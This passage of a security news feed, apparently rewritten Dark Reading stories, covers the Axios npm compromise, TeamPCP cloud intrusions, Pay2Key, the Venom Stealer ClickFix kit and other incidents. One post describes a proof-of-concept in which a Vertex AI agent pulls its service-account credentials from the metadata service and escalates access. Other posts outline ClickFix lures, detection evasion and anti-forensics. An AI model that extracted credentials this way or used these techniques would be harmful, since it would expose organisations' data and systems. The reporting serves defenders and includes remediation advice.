For Elkins, the continued reliance on [Brazilian banking trojans](https://www.darkreading.com/threat-intelligence/whatsapp-eternidade-trojan-self-propagates-brazil) is notable. "It's interesting that they're still hung up on banking Trojans, because a lot of time these newer threat actors are focusing on: How do we gain access to this customer's network? How do we start infiltrating exfiltrating data? How can we use ransomware to get paid?" he observes.

While banking trojans represent a direct method for financial theft, modern endpoint protections are increasingly effective at mitigating them. "I don't think most of the banking Trojans succeed at this point, in today's environment, because they're so easy to attack now," Elkins says.

Organizations with standard, up-to-date cybersecurity controls are well-positioned to defend against these campaigns. "They're getting caught more easily. I mean, Windows Defender itself has so many different rule sets for catching AutoIT executables [like those used by Water Saci] and stopping that behavior," he notes. "That's why, a lot of the time in my research, we don't see it get all the way to the end in the customer's environment. It's usually stopped at the email stage."

## About the author

Nate Nelson is a journalist and scriptwriter. He writes for "Darknet Diaries". the most popular podcast in cybersecurity — and co-created the former Top 20 tech podcast "Malicious Life." Before joining Dark Reading, he was a reporter at Threatpost.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Hasbro unauthorized access incident: Remediation and business continuity efforts</title>
        <link>https://security.shortwaves.live/blog/05282268-447a-4d14-9b63-b4d0db144a5c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/05282268-447a-4d14-9b63-b4d0db144a5c</guid>
        <pubDate>Fri, 03 Apr 2026 03:05:19 GMT</pubDate>
        <description>Hasbro recently disclosed an unauthorized network access incident but successfully maintained key operations through proactive business continuity planning. This event illustrates the measurable value of established incident response strategies in minimizing supply chain and production disruptions.</description>
        <content:encoded><![CDATA[
            The household toys and games manufacturer Hasbro experienced a recent security incident. However, the company indicated it will continue taking orders and shipping products, though some delays may occur during remediation efforts.

In an 8-K filing with the Securities and Exchange Commission (SEC), Hasbro disclosed that on March 28 it discovered "unauthorized access" within its network. The details provided point to both immediate operational challenges and proactive resilience measures.

On the positive front, the company demonstrated preparedness for such scenarios. Unlike organizations that must fully shut down operations during major incidents, Hasbro "has implemented and continues to implement business continuity plans to enable it to continue to take orders, ship product, and conduct other key operations while it resolves this situation."

To contain the issue, Hasbro had to take certain systems offline. The company noted that these interim business continuity measures "may continue for several weeks before the situation is fully resolved and may result in some delays."

Benny Lakunishok, CEO and co-founder of Zero Networks, speculates that the incident might involve ransomware—alluding to it with the phrase "handsome mare"—and observes that the wording in Hasbro's filing warrants attention. "The fact that they said unauthorized access, and the fact that they are saying full recovery could take several weeks — those are red flags," Lakunishok adds.

## Retail sector risks

"[Retail] remains a high-value target because it combines sensitive customer data with operational complexity," says Kevin Marriott, director of cyber content strategy and IP at Immersive. "Companies like Hasbro sit across global supply chains, ecommerce platforms, and third-party ecosystems, creating a wide and often fragmented attack surface," making them frequent targets for opportunistic, financially motivated, and supply-chain-focused threat actors.

Lakunishok adds that, similar to other manufacturing entities, Hasbro prioritizes keeping production and fulfillment lines operational. "That's priority number one: they have a lot of orders, so there's a lot at stake if there's any ransomware or [disruption] of a fulfillment line. That's a lot of money [on the line], so if it's about paying $10 million, that's something they might do."

Hasbro has not specified the exact nature of the unauthorized access. The company has not yet responded to Dark Reading's request for additional details.

## Maintaining production continuity

Security incidents can severely disrupt operations, sometimes forcing production lines to halt entirely. Last year, Jaguar Land Rover experienced a ransomware incident that caused weeks of shutdowns, leading to hundreds of millions of dollars in losses for the company and affecting the broader UK economy.

In the retail sector, Marriott notes it is rare for organizations to maintain normal operations during an active security event. "There is often a significant level of disruption across logistics, customer services, payments or internal system access," he adds.

Marriott emphasizes the importance of focusing on both prevention and incident response planning. "It's about ensuring teams across an organization are prepared to both recognise and respond when something inevitably gets through. Businesses that regularly test their people through real-world simulations build the muscle memory needed to identify these tactics early and contain threats quickly."

Despite the limited details, Marriott commends Hasbro for keeping production running. "What we have seen so far from Hasbro's incident response suggests that they have effective planning and the right controls in place, which have so far enabled them to navigate a cyber incident without it escalating into a full-scale operational crisis," he observes. "This doesn't happen by accident. It's the result of organizations that have gone beyond static plans and have actively tested how they would respond under pressure."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat Intelligence Update: Axios NPM Compromise, TeamPCP Cloud Operations, and Emerging MaaS Threats</title>
        <link>https://security.shortwaves.live/blog/142eba32-4cd8-4b07-9231-cf63f796a172</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/142eba32-4cd8-4b07-9231-cf63f796a172</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:53 GMT</pubDate>
        <description>This update covers recent shifts in the threat situation, including an unsafe dependency discovered in the Axios NPM package, rapid cloud enumeration by TeamPCP, and permission risks in AI agents. We detail the technical mechanics of these operations and provide actionable remediation steps to help security teams harden their environments.</description>
        <content:encoded><![CDATA[
            The current security environment is defined by a tightening loop between initial exposure and deep infrastructure compromise, driven by sophisticated supply chain methodologies and scaled social engineering. The most significant development in the past 24 hours involves a high-precision compromise of Axios, the widely used JavaScript HTTP client library. With over 400 million monthly downloads, Axios represents a critical node in the global software supply chain. Security researchers identified unauthorized versions, `axios@1.14.1` and `axios@0.30.4`—published following the compromise of a maintainer’s account. These versions introduced an unsafe dependency, `plain-crypto-js@4.2.1`, which installs a remote access trojan (RAT) across Windows and macOS systems. While registry maintainers removed the packages within hours, the incident indicates a shift in methodology: threat actors are actively staging infrastructure for long-term access brokering rather than immediate financial returns.

### Cloud enumeration and TeamPCP operations

This supply chain pressure extends directly into cloud and SaaS environments. Security teams are currently tracking a group known as TeamPCP, which has rapidly operationalized secrets exposed during recent compromises of open-source tools like the Trivy scanner and LiteLLM library. TeamPCP demonstrates high operational speed, often initiating environment discovery within 24 hours of credential exposure. The group uses validated AWS access keys and Azure secrets to perform extensive enumeration, mapping out S3 buckets and Elastic Container Service (ECS) instances. In several cases, they have utilized the ECS Exec feature to run unauthorized scripts directly on production containers, circumventing traditional perimeter controls by repurposing the organization’s own administrative tools.

### Regional trends and workforce constraints

The regional security environment in Latin America (LATAM) mirrors this intensity while facing specific structural challenges. Organizations in the region currently record nearly 40% more security incidents than the global average. Government agencies manage roughly 4,200 incidents per week, nearly double the global cross-industry average. This volume is driven by factors including the wide adoption of payment systems like Brazil’s Pix, which has led to a mature ecosystem of banking Trojans, alongside the persistence of legacy government infrastructure. At the same time, recent workforce data shows the region’s defensive capacity is restricted by rigid hiring practices. The industry faces a shortfall of 350,000 cybersecurity professionals, yet 70% of the existing LATAM workforce is self-taught, frequently lacking the formal university degrees that corporate job descriptions still mandate.

### Venom Stealer and Vertex AI permission risks

Simultaneously, the technical barriers to entry for sophisticated operations are falling due to malware-as-a-service (MaaS) platforms like Venom Stealer. This platform automates "ClickFix" social engineering campaigns, which deceive users into manually executing commands under the guise of fixing a CAPTCHA or installing a font update. Because the user initiates the execution, these techniques frequently bypass security logic designed to monitor for suspicious parent-child process relationships. Venom Stealer presents an elevated risk because it establishes a persistent exfiltration pipeline rather than performing a single credential harvesting event. It continuously monitors browser login files for new data and includes a GPU-powered engine designed to crack cryptocurrency wallet seeds found on the local filesystem. This automation enables lower-tier actors to conduct multi-stage data theft for a $250 monthly subscription.

As organizations integrate technologies like AI agents, they inherit specific permission-related risks. Security research into Google Cloud’s Vertex AI platform recently found that default configurations often grant AI agents excessive permissions through the Per-Project, Per-Product Service Agent (P4SA). In a proof-of-concept, researchers showed that an agent could be directed to extract credentials providing access to both the specific project and broader Google Workspace data, including Gmail and Drive. This over-privilege issue can transform autonomous agents into potential insider risks if teams do not strictly govern their underlying service accounts.

### Recommended defensive actions

To protect environments, the immediate priority is a thorough audit of the JavaScript build pipeline. We recommend organizations verify they have not pulled the unauthorized Axios versions. Any recent use of `axios@1.14.1` or `axios@0.30.4` should be treated as a full-system exposure, requiring complete credential rotation and forensic analysis. To counter the operational speed of groups like TeamPCP, security teams should implement active monitoring for anomalous enumeration. Specifically, monitor closely for high volumes of `git.clone` events or the unexpected use of administrative features like ECS Exec.

Mitigating the risk of "ClickFix" techniques and platforms like Venom Stealer requires adjustments to endpoint hardening. We recommend using Group Policy to restrict PowerShell execution for standard users and disabling the "Run" dialog where possible. Additionally, training programs should help employees recognize the specific mechanics of these campaigns: any web prompt asking a user to copy and paste a command into a terminal should be treated as a high-severity indicator of compromise. In cloud environments, transitioning including default AI agent permissions to a "Bring Your Own Service Account" (BYOSA) model is necessary to enforce the principle of least privilege.

### State-aligned operations and attribution

The distinction between financially motivated cybercrime and state-aligned sabotage continues and blur. Iranian state-backed groups, such as Pay2Key, increasingly adopt "pseudo-ransomware" tactics. These operations use encryption to mimic standard extortion, but the primary goal is often data destruction or political retribution. By outsourcing these operations to Russian threat actor forums through high-percentage profit-sharing models, state actors achieve a level of deniability that complicates both attribution and legal compliance for affected organizations.

While registry maintainers contained the Axios compromise relatively quickly, the full scope of the downstream impact remains unknown. The sophistication of the tradecraft—staged dependencies, multi-platform executables, and self-deleting anti-forensic measures, suggests that UNC1069, the North Korean group suspected of the operation, is refining a blueprint for future supply chain compromises. We advise security teams to maintain strict monitoring, as credentials harvested during these brief exposure windows often fuel secondary access phases weeks or months later.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Tracking the Resurgence of Pay2Key and Pseudo-Ransomware Operations</title>
        <link>https://security.shortwaves.live/blog/d84434fa-f7da-427c-b537-83384c820a19</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/d84434fa-f7da-427c-b537-83384c820a19</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:53 GMT</pubDate>
        <description>An analysis of recent intelligence detailing how state-aligned actors are leveraging pseudo-ransomware and financially motivated threat actors to obscure destructive operations. We review these evolving tactics and provide actionable guidance to help organizations protect their infrastructure and navigate associated compliance risks.</description>
        <content:encoded><![CDATA[
            State-aligned actors in Iran are establishing partnerships with participants including Russian threat actor forums and blur the boundaries between state-directed and financially motivated cyber operations. This operational shift supports their broader geopolitical objectives in the ongoing conflict involving the US and Israel.

As part of these developments, an Iranian state-backed operation known as Pay2Key has resurfaced. According to a recent report from KELA's Cyber Intelligence Center, the group is actively recruiting affiliates to target high-impact entities in the US. The methodology involves deploying "pseudo-ransomware" and operating as an initial access broker (IAB) for other ransomware groups to help disruption and financial gain.

KELA researchers note that pseudo-ransomware relies on encryption but serves primarily as a destructive tool, functioning similarly to wiper malware rather than a mechanism for standard financial extortion.

These shifts reflect a broader strategy to adopt established cybercrime methodologies following the joint US-Israel military action on February 28. KELA's analysis indicates that these operations create significant business disruption while introducing complex attribution challenges, leading to elevated legal and operational risks for affected organizations.

When an organization experiences a ransomware or extortion event, determining the identity of the threat actor becomes a critical compliance requirement. If ransom payments are inadvertently routed to state-linked entities, such as those sanctioned by the US Treasury’s Office of Foreign Assets Control (OFAC)—organizations face the risk of severe financial and legal penalties.

## Evaluating historical and current methodologies

The recent increase in Pay2Key activity parallels events from last July, following a conflict where the US and Israel targeted Iranian nuclear facilities. During that period, Pay2Key operations resumed with a focus on Western organizations, offering increased financial incentives for operations aligning with Iran’s geopolitical goals.

Currently, operators are utilizing a similar profit-sharing model. Pay2Key affiliates recruited online receive an increased share, including 70% up to 80%—when they successfully gain unauthorized access to networks belonging and designated geopolitical adversaries, primarily within the US and Israel. KELA describes this incentive structure as a method of outsourcing geopolitical operations to a broader pool of threat actors, acting as a scalable force multiplier for state-aligned activities.

Simultaneously, state-aligned groups are deploying destructive tools under the guise of financial extortion. By using ransomware-style encryption, these actors obscure data destruction, sabotage, or political retribution. For example, the Iran-backed group APT Agrius uses the Apostle malware, which researchers observed was retrofitted from its original data wiper format into a ransomware variant. Applying financial extortion frameworks over destructive wipers allows these actors to obscure their primary motives and complicates incident response efforts.

## Adapting defenses for hybrid threats

The deliberate blending of state-sponsored operations and opportunistic financial extortion means that defenders must simultaneously manage operational, financial, and geopolitical risks. Navigating this environment requires organizations to implement foundational resilience measures alongside proactive controls.

To protect organizational infrastructure against these evolving tactics, we recommend the following defensive actions:

* Apply security patches and continuously monitor internet-facing edge devices for unauthorized access.

* Deploy phishing-resistant multi-factor authentication (MFA) across the environment.

* Maintain secure, offline backups and regularly test incident response readiness.

Additionally, we advise organizations to properly segment IT and operational technology (OT) systems while hardening access controls. This structural separation reduces the risk of lateral movement by state-backed threat actors. Maintaining continuous threat intelligence monitoring will also improve an organization's visibility into adversary infrastructure and the compromised credential market, enabling faster identification of potential risks.

*Context Note: The original reporting for this intelligence was provided by Elizabeth Montalbano, a contributing writer with over 25 years of professional experience covering technology, business, and culture.*
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>TeamPCP expands unauthorized access to cloud and SaaS environments using compromised credentials</title>
        <link>https://security.shortwaves.live/blog/fc07bff1-e7d4-4dd3-85aa-1cdce0174039</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/fc07bff1-e7d4-4dd3-85aa-1cdce0174039</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:52 GMT</pubDate>
        <description>Recent supply chain incidents involving popular open source tools have led to unauthorized access across cloud and SaaS platforms. Security teams must rapidly rotate exposed credentials and monitor for anomalous enumeration activity to protect their environments.</description>
        <content:encoded><![CDATA[
            TeamPCP is leveraging compromised credentials obtained including recent supply chain incidents and access cloud and software-as-a-service (SaaS) environments.

This month, unauthorized modifications affected several open source software projects, beginning with the Aqua Security-maintained Trivy scanner and Checkmarx's KICS static code analysis tool. The threat actors subsequently compromised LiteLLM, an open source Python library, and the PyPI package of Telnyx, which developers use for voice AI agents.

Across all four campaigns, the objective remained consistent: utilize modified open source software to deploy credential-harvesting utilities within organizations. These tools are designed to collect user credentials, API keys, SSH keys, and other sensitive secrets.

TeamPCP has since escalated its operations, using these compromised credentials to gain unauthorized access to AWS and Azure environments, as well as various SaaS instances. This progression shows why rapid response protocols are necessary following supply chain exposures. Organizations that delay rotating and revoking exposed credentials face an elevated risk of unauthorized access.

## TeamPCP expands cloud access operations

In a recent security bulletin, Wiz Research detailed how its customer incident response team (CIRT) investigated and addressed multiple incidents linked to TeamPCP following the initial supply chain compromises.

The Wiz CIRT first detected the unauthorized use of credentials on March 19, observing threat actors utilizing the Trufflehog open source tool to validate the exposed secrets. The team noted validation activity targeting AWS access keys, Azure application secrets, and various SaaS tokens.

Within the affected AWS environments, the Wiz CIRT observed that the threat actors rapidly utilized the compromised secrets. Researchers noted that discovery operations began as quickly as 24 hours after the initial credential exposure.

TeamPCP conducted extensive enumeration in affected AWS environments, gathering data on identity and access management roles and S3 buckets, while specifically mapping Amazon Elastic Container Service (ECS) instances.

Following enumeration, the unauthorized parties extracted data including S3 buckets and AWS Secrets Manager. They also utilized the ECS Exec feature to execute Bash commands and Python scripts on running containers. According and Wiz researchers, this access allowed the threat actors to further map the environment and access additional sensitive data.

Wiz Research indicated to Dark Reading that while they do not provide specific figures on the number of impacted environments, the activity spans multiple cloud platforms. "What we can share is that our research shows this activity isn't limited to a single cloud," Wiz Research noted. "We've observed compromises across Azure, GitHub, and other SaaS providers, reflecting how threat actors reuse validated credentials across environments."

## The importance of rapid response

Beyond AWS environments, the Wiz CIRT documented unauthorized activity in GitHub, where TeamPCP utilized the platform's workflows to execute code in targeted repositories. The researchers noted that the threat actors also used compromised GitHub Personal Access Tokens to clone repositories at scale.

These escalating operations indicate that TeamPCP prioritizes speed over stealth. The campaigns demonstrate the necessity for swift incident response when credentials are exposed. Wiz Research stated that organizations taking immediate action to revoke or rotate access successfully limited their overall exposure.

We recommend that any organization potentially impacted by the supply chain compromises affecting Trivy, KICS, LiteLLM, or Telnyx immediately rotate all related secrets and credentials. Because threat actors may have established access to cloud instances prior to credential rotation, security teams should methodically hunt for anomalous activity within their environments.

Key indicators of suspicious activity include the unusual use of VPNs, a high volume of "git.clone" events within a short timeframe, and unexpected enumeration processes. Wiz has published specific indicators of compromise (IOCs) for the TeamPCP campaigns, and we advise security teams to monitor for these patterns while ensuring comprehensive audit logging is enabled across their infrastructure.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing AI agents: Addressing default permission risks in Google Cloud Vertex AI</title>
        <link>https://security.shortwaves.live/blog/fdc13099-4baf-4fb4-894d-35c8b63b126c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/fdc13099-4baf-4fb4-894d-35c8b63b126c</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:52 GMT</pubDate>
        <description>Security research into Google Cloud’s Vertex AI platform reveals how excessive default permissions in deployed AI agents can lead to unauthorized access to sensitive data and infrastructure. Implementing a &quot;Bring Your Own Service Account&quot; (BYOSA) model allows organizations to enforce least-privilege access and safely integrate agentic AI into their environments.</description>
        <content:encoded><![CDATA[
            As organizations increasingly deploy AI agents to automate complex operational workflows, ensuring these systems are configured with appropriate permissions is a critical defensive measure. Recent security research by Palo Alto Networks details how this risk can materialize within Google Cloud's Vertex AI platform. Their analysis demonstrates that broad default permissions could enable an unauthorized party to misuse a deployed AI agent, potentially leading to unauthorized access to sensitive data and restricted internal infrastructure.

## The risk of excessive default permissions

Vertex AI is a Google Cloud platform offering an Agent Engine and Application Development Kit. Developers use these tools to build autonomous agents that interact with APIs, manage files, query databases, and execute decisions with minimal human oversight. Because these agents automate significant enterprise workflows—analyzing data, powering customer service tools, and enabling existing cloud services—they often require broad access to cloud environments.

During a security assessment, researchers identified that every deployed Vertex AI agent utilizes a default service account, known as the Per-Project, Per-Product Service Agent (P4SA), which was provisioned with excessive default permissions. If a malicious actor successfully extracts the agent's service account credentials, they could leverage these permissions to access sensitive areas of a customer's cloud environment. The research methodology demonstrated that these credentials could also grant access to Google's internal infrastructure, allowing the retrieval of proprietary container images and revealing hardcoded references to internal Google storage buckets.

## Validating the scope of access

To validate this risk, researchers developed a proof-of-concept Vertex AI agent. Once deployed, the agent queried Google's internal metadata service to extract the active credentials of the underlying P4SA service agent. These credentials provided the necessary permissions to escalate access beyond the AI agent's immediate environment, reaching the customer's broader Google Cloud Project and elements of Google's internal infrastructure.

"This level of access constitutes a significant security risk, transforming the AI agent from a helpful tool into an insider threat," wrote Palo Alto researcher Ofir Shaty in the published findings. He noted that the default scopes set on the Agent Engine could potentially extend access into an organization's Google Workspace, including services such as Gmail, Google Calendar, and Google Drive.

Ian Swanson, VP of AI security at Palo Alto Networks, emphasized the need for organizations to assess potential risks before deployment and protect agents during runtime. “Agents represent a shift in enterprise productivity including AI that talks and AI that acts,” he stated, noting that this shift introduces risks of unauthorized actions alongside traditional data exposure concerns.

## Implementing least-privilege access

Following the disclosure of these findings, Google updated its official documentation to clarify how Vertex AI uses agents and resources. To secure agentic AI environments, Google recommends that organizations replace the default service agent on Vertex Agent Engine with a custom, dedicated service account.

A Google spokesperson emphasized this approach as a primary defense mechanism. "A key best practice for securing Agent Engine and ensuring least-privilege execution is Bring Your Own Service Account (BYOSA)," the spokesperson stated. "Using BYOSA, Agent Engine users can enforce the principle of least privilege, granting the agent only the specific permissions it requires to function and effectively mitigating the risk of excessive privileges."

## About the original reporting

This security bulletin preserves the factual reporting originally authored by Jai Vijayan, a contributing writer and technology reporter with over 20 years of experience in IT trade journalism. Previously a Senior Editor at Computerworld covering information security, data privacy, big data, Hadoop, the Internet of Things, e-voting, and data analytics, Vijayan also covered technology for The Economic Times in Bangalore, India. He holds a Master's degree in Statistics and resides in Naperville, Illinois.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Unauthorized Modifications Identified in Axios NPM Package</title>
        <link>https://security.shortwaves.live/blog/3422bdcc-63b6-4a82-96f4-d870d18a5e5c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/3422bdcc-63b6-4a82-96f4-d870d18a5e5c</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:50 GMT</pubDate>
        <description>Security researchers identified two unauthorized versions of the popular Axios NPM package that introduced a remote access trojan (RAT) through a hidden dependency. Organizations using Axios should review their dependency logs for specific indicators of compromise and verify their recent installation pipelines.</description>
        <content:encoded><![CDATA[
            The Axios JavaScript NPM package recently experienced a software supply chain security incident. As the most widely used JavaScript HTTP client library, downloaded over 400 million times per month, this event demonstrates the practical need for strict dependency validation across development environments.

Software development security vendor StepSecurity identified that two unauthorized versions of the library had been published to the NPM registry: `axios@1.14.1` and `axios@0.30.4`.

These versions introduced a new, unverified dependency named `plain-crypto-js@4.2.1`. Masquerading as the legitimate `crypto-js` library, this package executes a script that installs a remote-access trojan (RAT) compatible with Windows, Linux, and macOS systems. Researchers trace the origin of the incident to unauthorized access to the lead maintainer's account, "jasonsaayman."

"The dropper contacts a live command-and-control server and delivers platform-specific, second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection," StepSecurity explained in its analysis. "There are zero lines of malicious code inside axios itself, and that's exactly what makes this attack so dangerous."

The unauthorized packages remained active for approximately three hours before NPM removed all traces of the campaign. However, Endor Labs noted that one version of the `plain-crypto-js` dependency was publicly exposed for more than 21 hours before registry maintainers applied a security hold. Because the software is heavily adopted, organizations should check their environments for indicators of compromise (IOCs) published by StepSecurity, Endor Labs, and Socket.

Feross Aboukhadijeh, CEO of Socket, recommends that teams using the JavaScript ecosystem should pause standard operations and verify their dependencies immediately to ensure their environments remain secure.

## Threat Actor Motivations and Attribution

Determining the origin of supply chain incidents requires careful observation of post-installation behavior. Early industry reports suggested a link to TeamPCP, a group associated with cloud-native unauthorized access and ransomware. However, Google Threat Intelligence subsequently issued a statement attributing the activity to suspected North Korean threat actor UNC1069.

Google Threat Intelligence Group chief analyst John Hultquist stated that the full scope of the incident remains under investigation, but the organization expects the downstream impact to be significant.

Ashish Kurmi from StepSecurity observed that the trojan's operational pattern points toward access brokering or targeted espionage rather than rapid credential theft.

"The RAT's first action is device profiling (hostname, username, OS, processes, directory walk) before doing anything else — that's cataloging, not looting. A blunt infostealer grabs credentials and leaves; this one fingerprints the environment and waits for instructions," Kurmi says. "Axios lives in developer environments holding source code, deploy keys, and cloud credentials a cryptominer has no use for, and the 18-hour pre-staging, simultaneous branch poisoning, and anti-forensics suggest an actor who has done this before."

If UNC1069 is responsible, this represents a notable shift in their operational methodology. The group operates as an arm of North Korea's Lazarus Group, which historically targets cryptocurrency wallets and fintech infrastructure. A verified link would mark their first successful compromise of a top-tier NPM package.

## Advanced Operational Tradecraft in the Open Source Supply Chain

The open source supply chain has seen multiple security events in recent months, including the Shai-hulud and GlassWorm incidents. While those relied on opportunistic propagation, researchers categorize the Axios incident as highly precise.

"The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct," StepSecurity reported. "Within two seconds of npm install, the malware was already calling home to the attacker's server before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package."

Kurmi points out that executing this required more than standard typosquatting techniques. The threat actor had to gain access to a verified maintainer account, bypass the Axios project's OIDC-based publishing pipeline, and implement anti-forensic measures to manipulate `npm list` reports post-installation.

He places this incident along a continuum of increasing operational awareness, alongside recent compromises involving Nx Singularity, tj-actions/changed-files, Trivy, Checkmarx KICS, LiteLLM, and the Canister worm.

From a defender's perspective, the brief three-hour primary exposure window naturally limited total installations. However, the silent execution model means developers impacted during that timeframe would not have received standard error warnings or system alerts. A quiet, traceless execution presents a fundamentally different operational risk than a loud failure that prompts immediate remediation.

Peyton Kennedy, a security researcher at Endor Labs, observes that the methods used in this incident demonstrate a clear escalation in supply chain methodology.

"Last year, Shai-hulud's worm-based propagation was novel, and we've since seen that technique replicated in CanisterWorm and other campaigns," Kennedy says. "This attack is a different kind of escalation: staged dependency seeding to evade scanners, platform-specific payload chains, and self-deleting anti-forensic cleanup. This looks like deliberate, planned tradecraft from an experienced threat actor."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Venom Stealer platform automates ClickFix social engineering and data exfiltration</title>
        <link>https://security.shortwaves.live/blog/4a02f922-ddd3-4cbd-918b-4831cc91e91c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/4a02f922-ddd3-4cbd-918b-4831cc91e91c</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:49 GMT</pubDate>
        <description>Security researchers have identified Venom Stealer, a malware-as-a-service platform that automates ClickFix social engineering campaigns and cryptocurrency theft. The platform combines deceptive user prompts with continuous data exfiltration, emphasizing the need for organizations to strengthen endpoint execution controls and monitor outbound traffic.</description>
        <content:encoded><![CDATA[
            Managing exposure to ClickFix-style social engineering campaigns requires understanding how these threats are evolving. Recently, security researchers at BlackFog identified a newly distributed malware-as-a-service (MaaS) platform that automates the technical steps of these campaigns for threat actors.

Operating under the name "VenomStealer," the developer offers a MaaS platform on cybercriminal networks that allows operators to create a persistent, multistage execution flow. Based on the initial ClickFix user interaction, the software automates unauthorized access to credentials, cryptocurrency wallets, and ongoing data exfiltration.

According to BlackFog founder and CEO Darren Williams, Venom differentiates itself from commodity stealers like Lumma, Vidar, and RedLine by extending beyond a single credential harvesting event. The platform integrates ClickFix social engineering directly into its operator panel, automating the post-access sequence and establishing a continuous exfiltration pipeline that remains active after the initial execution package finishes running.

Marketed on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform operates on a subscription model, costing $250 a month or $1,800 for lifetime access. The operation includes a vetted application process, Telegram-based licensing, and a 15% affiliate program. The delivery mechanism relies on a native C++ binary compiled per-operator directly from the web panel.

Unlike traditional infostealers that execute once, transmit data, and exit, Venom Stealer continuously scans the affected system. It harvests credentials, session cookies, and browser data while targeting cryptocurrency wallets and stored secrets. The platform also automates wallet cracking and fund draining. The operation appears highly active, with the developer shipping multiple platform updates throughout March alone.

## Step-by-step ClickFix execution

A campaign built with Venom Stealer begins when an individual lands on a deceptive ClickFix page hosted by the operator. The platform includes four templates for both Windows and macOS environments: a fake Cloudflare CAPTCHA, a fake OS update, a simulated SSL certificate error, and a fake font installation page. Each template instructs the user to open a Run dialog or Terminal window, copy and paste a specific command, and press Enter.

Because the user initiates the execution manually, the process appears as normal user activity, which frequently bypasses detection logic that relies on evaluating parent-child process relationships.

Available Windows execution packages in the kit include.exe,.ps1 (enabling fileless execution via PowerShell),.hta, and.bat options. For macOS environments, the templates utilize bash and curl. The platform allows operators to configure custom domains through Cloudflare DNS, ensuring the panel URL remains hidden from the command string copied by the user.

Once executed, the software scans every Chromium and Firefox-based browser on the machine. It extracts saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults across all browser profiles.

The execution sequence also includes specific evasion capabilities. For instance, the password encryption in versions 10 and 20 of Chrome is bypassed using a silent privilege escalation technique. This extracts the decryption key without triggering a user account control (UAC) dialog, minimizing forensic artifacts. Additionally, the software captures system fingerprinting and browser extension inventories, compiling a comprehensive profile of the affected user.

This collected data leaves the infected device immediately, with little to no local staging or delay. Without adequate visibility into outbound network traffic, detecting this extraction phase is significantly more difficult for security teams.

## Persistent data exfiltration pipeline

Upon discovering wallet data, the software transfers it to a server-side, GPU-powered cracking engine. This engine automatically cracks cryptocurrency wallets, including MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. A March 9 update to the platform introduced a File Password and Seed Finder, which searches the local filesystem for saved seed phrases and feeds any discovered data into the cracking pipeline.

Consequently, users who avoid saving credentials directly in their browsers still face exposure if seed phrases are stored anywhere on their local machine.

While some newer infostealer variants include persistence mechanisms, Venom Stealer maintains an active presence after the initial compromise. It continuously monitors Chrome’s Login Data file, capturing newly saved credentials in real-time. This mechanism undermines standard credential rotation as an incident response measure and extends the data exfiltration window, making it more challenging for security teams to determine the full scope of a security incident.

## Reducing exposure to ClickFix campaigns

Security researchers from Proofpoint first identified ClickFix techniques roughly two years ago, and the methodology has since gained significant traction. The technique relies on instilling a sense of urgency—prompting users to fix an error or install an update—while using familiar, benign interfaces like CAPTCHA prompts to create a false sense of security. The primary goal is to trick the user into manually executing unauthorized commands.

Organizations can safeguard their environments and reduce exposure to threats like Venom Stealer by implementing several preventative controls:

* Restrict PowerShell execution: Limit access to PowerShell for standard users and enforce strict execution policies.

* Disable the Run dialog: Use Group Policy to remove the Run dialog for non-administrative users.

* Enhance security awareness: Train employees to recognize ClickFix-style social engineering, specifically the danger of copying and pasting commands from web prompts into terminals.

* Monitor outbound traffic: Because the sequence relies on data leaving the device, monitoring and controlling outbound traffic provides a critical opportunity to detect exfiltration activity and mitigate the impact of credential theft.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Security incidents increase pressure on Latin American government agencies</title>
        <link>https://security.shortwaves.live/blog/76edb046-f2a5-4ee2-9353-5636dd0665a4</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/76edb046-f2a5-4ee2-9353-5636dd0665a4</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:49 GMT</pubDate>
        <description>Government organizations in Latin America are navigating an elevated volume of security threats targeting public infrastructure. Assessing the structural factors behind this trend reveals clear, actionable steps agencies can take to secure legacy systems and protect citizen data.</description>
        <content:encoded><![CDATA[
            Government organizations across Latin America and the Caribbean are managing a heightened volume of security incidents targeting critical agencies at rates exceeding global averages. Recent events include unauthorized access attempts against a national health agency in Colombia, a security incident affecting Puerto Rico's transportation department, and threat actors utilizing AI systems to target Mexico's government infrastructure.

In March, organizations in Latin America recorded an average of 3,050 security incidents per week, compared to a global average of just over 2,000, according to data from Check Point Software Technologies. Government agencies face even higher exposure, recording nearly 4,200 incidents weekly—approximately 1,000 more than the cross-industry average, notes Angel Salazar, security engineering manager for the Latin American region at Check Point.

Salazar explains that government networks typically experience constant exposure due to public services that must remain online, legacy systems that are difficult to replace, and high user turnover. Together, these factors create a continuous external digital footprint.

